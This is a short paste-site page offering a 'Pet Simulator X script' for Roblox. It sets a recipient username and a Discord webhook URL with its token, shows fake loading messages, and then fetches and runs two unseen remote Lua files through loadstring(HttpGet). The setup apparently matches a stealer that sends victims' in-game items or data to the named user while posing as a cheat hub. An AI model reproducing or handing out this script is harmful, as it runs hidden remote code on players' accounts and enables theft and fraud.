TEXT   84
Pet Simulator x script
Guest on 11th February 2023 09:47:20 PM


  1. Username = "NinjaKungPro"
  2. WebHook = "https://discord.com/api/webhooks/1072595861286162593/EycpOncCk6KX1OXtl7AspavnyCtJF13ztUOdp9ukjLE6E8ALGtdRUXGVvjGeUqcGQVTd"
  3.  
  4. _G.CustomScriptName = "Hub Loading"
  5. _G.Text1 = "Script Loaded..."
  6. _G.Text2 = "Waiting for Script"
  7. _G.Text3 = "Checking Scripts..."
  8. _G.Text4 = "Starting Scripts..."
  9.  
  10. loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
  11.  
  12. loadstring(game:HttpGet("https://raw.githubusercontent.com/MrFeastEz/PSX/main/scripts/main.lua"))();

Raw Paste

Login or Register to edit or fork this paste. It's free.